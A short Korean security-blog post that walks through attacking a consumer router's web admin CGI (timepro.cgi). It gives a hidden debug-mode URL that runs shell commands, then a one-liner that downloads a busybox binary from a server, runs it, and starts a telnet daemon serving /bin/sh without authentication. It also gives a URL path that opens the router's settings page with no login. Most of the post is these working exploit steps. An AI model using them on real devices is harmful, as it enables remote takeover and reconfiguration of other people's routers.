반응형
백도어에 대한 내용은 피해자를 유발할 수 있으므로 삭제했습니다.
디버그 모드에 관한 내용은 유용할 거 같아서 일단 놔둘 생각입니다. 이 기능은 계속 있었으면 좋겠네요.
http://공유기주소/cgi-bin/timepro.cgi?flag=debug를 입력하면 이상한 놈이 나옵니다.(최신버전은 debug 대신 bluesky입니다..)
리눅스 명령어를 실행할 수 있습니다.(약간 불편하네요)
여기서 http라는 wget와 비슷한 역할을 하는 프로그램을 찾아서 busybox를 올린 뒤(내장 busybox는 기능이 얼마 없더군요)
busybox에 들어있는 telnetd를 이용하여 putty로 접속했더니..
셸을 띄울 수 있었습니다.
/sbin/http get http://서버/busybox > /tmp/busybox & /tmp/busybox telnetd -l /bin/sh 2> /tmp/log &
이렇게 입력하면 텔넷 데몬이 가동되어 접속할 수 있습니다(내부 네트웤에서만 가능합니다).
http://IP:1234/cgi-bin/timepro.cgi?tmenu=main_frame&smenu=main_frame
로그인 암호 걸려있어도, 인증 절차없이 바로 시스템 셋팅 화면이 나옵니다.
1234는 port-번호, ????는 위의 이미지에서 가려진 글.
외부에서 공유기의 설정을 바꿀 수 있게 셋팅하면 (이 때, port번호 정하죠)
위의 경로로 접근시 인증절차 없이 바로 셋팅 화면이 나옵니다.
[니 칼은 니가 갈아라]
반응형
'Security > Web' 카테고리의 다른 글
| 싸이월드 xss (0) | 2008.12.20 |
|---|---|
| 네이버XSS (0) | 2008.09.02 |
| HDSI 사용법 (0) | 2007.10.22 |
| File Upload 시의 알고리즘 주의할점 (1) | 2007.08.14 |
| HackShield 의 구동원리&우회 (10) | 2007.08.12 |
